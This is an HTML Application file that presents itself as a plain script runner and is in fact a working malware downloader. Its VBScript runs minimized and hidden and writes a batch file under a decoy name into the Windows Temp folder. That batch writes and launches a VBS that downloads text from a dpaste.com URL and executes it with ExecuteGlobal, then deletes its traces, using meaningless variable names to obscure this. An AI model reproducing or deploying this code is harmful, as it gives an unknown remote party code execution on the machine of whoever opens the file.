<!DOCTYPE html>
<html>
<head>
<title>Executar Script</title>
<HTA:APPLICATION
APPLICATIONNAME="ScriptExecutor"
BORDER="none"
CAPTION="no"
SHOWINTASKBAR="no"
SINGLEINSTANCE="yes"
WINDOWSTATE="minimize"
/>
<script language="VBScript">
Dim symbols
Set symbols = CreateObject("WScript.Shell")
Dim evidences
evidences = "C:\Windows\Temp\favicons.bat"
Dim paralogs, though
Set paralogs = CreateObject("Scripting.FileSystemObject")
Set though = paralogs.CreateTextFile(evidences, True)
though.WriteLine "@echo off"
though.WriteLine "setlocal"
though.WriteLine "set ""fugues=C:\Windows\Temp\trickishly.vbs"""
though.WriteLine ">" & """%fugues%""" & " ("
though.WriteLine " echo Dim noncatalog, documentarist"
though.WriteLine " echo noncatalog = ""https://dpaste.com/9A4PA9CZ5.txt"""
though.WriteLine " echo Set documentarist = CreateObject^(""MSXML2.XMLHTTP""^)"
though.WriteLine " echo documentarist.open ""GET"", noncatalog, False"
though.WriteLine " echo documentarist.send"
though.WriteLine " echo If documentarist.Status = 200 Then"
though.WriteLine " echo ExecuteGlobal documentarist.responseText"
though.WriteLine " echo End If"
though.WriteLine ")"
though.WriteLine "start """" /b wscript //nologo ""%fugues%"""
though.WriteLine "timeout /t 1 /nobreak >nul"
though.WriteLine "del ""%fugues%"""
though.WriteLine "endlocal"
though.Close
symbols.Run "cmd.exe /c " & evidences, 0, False
window.close
</script>
</head>
<body>
</body>
</html>